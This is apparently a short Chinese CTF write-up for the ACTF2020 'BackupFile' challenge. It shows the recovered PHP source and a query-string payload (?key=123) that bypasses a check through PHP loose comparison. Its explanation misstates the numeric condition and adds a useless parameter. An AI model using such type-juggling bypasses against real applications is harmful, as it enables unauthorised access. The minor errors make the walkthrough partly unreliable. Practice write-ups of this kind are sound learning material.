ACTF2020_新生赛 BackupFile

CTF

发布日期: 2021-03-09

更新日期: 2024-07-27

文章字数: 103

阅读时长: 1 分

阅读次数:

[ACTF2020 新生赛]BackupFile

扫描目录，下载index.php.bak(这就是备份文件)index.php.bak代码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

代码审计

$key不为数字，且等于$str,显示flag

这里涉及到php的弱类型，123==”123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3”

传入参数得到flag

payload：
?key=123&str="123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"

0xdadream

https://0xdadream.github.io/2021/03/09/actf2020-xin-sheng-sai-backupfile/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 0xdadream !

web wp BUUCTF

极客大挑战_2019 HardSQL

HardSQL

2021-03-17 CTF

web wp BUUCTF

极客大挑战_2019 BabySQL

BabySQL

2021-03-09 CTF

web wp BUUCTF

ACTF2020_新生赛 BackupFile

[ACTF2020 新生赛]BackupFile

你的赏识是我前进的动力